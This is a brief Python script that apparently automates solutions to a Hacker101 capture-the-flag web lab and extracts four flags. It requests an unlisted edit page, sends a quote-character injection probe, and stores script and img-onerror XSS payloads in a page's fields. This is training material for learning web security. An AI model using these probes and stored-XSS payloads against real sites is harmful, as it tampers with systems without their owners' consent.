import requests
import re

url = "https://7a74d0c5389c327f82589980c926c053.ctf.hacker101.com/"

#First Flag
print("\nFLAG 1: " + re.search(r'\^FLAG\^([a-f0-9]+)\$FLAG\$', requests.get(url + "page/edit/7").text).group(0))

# Second Flag
print("\nFLAG 2: " + re.search(r'\^FLAG\^([a-f0-9]+)\$FLAG\$', requests.get(url + "page/edit/'").text).group(0))

# Third Flag (with third and fourth flag injection)

data = {
    "title":"<script>alert(1)</script>",
    "body":"<img src=x onerror='alert(1)'>"
}
requests.post(url + "page/edit/1", data=data)
print("\nFLAG 3: " + re.search(r'\^FLAG\^([a-f0-9]+)\$FLAG\$', requests.get(url).text).group(0))

# Fourth flag 
print("\nFLAG 4: " + re.search(r'\^FLAG\^([a-f0-9]+)\$FLAG\$', requests.get(url + "page/1").text).group(0))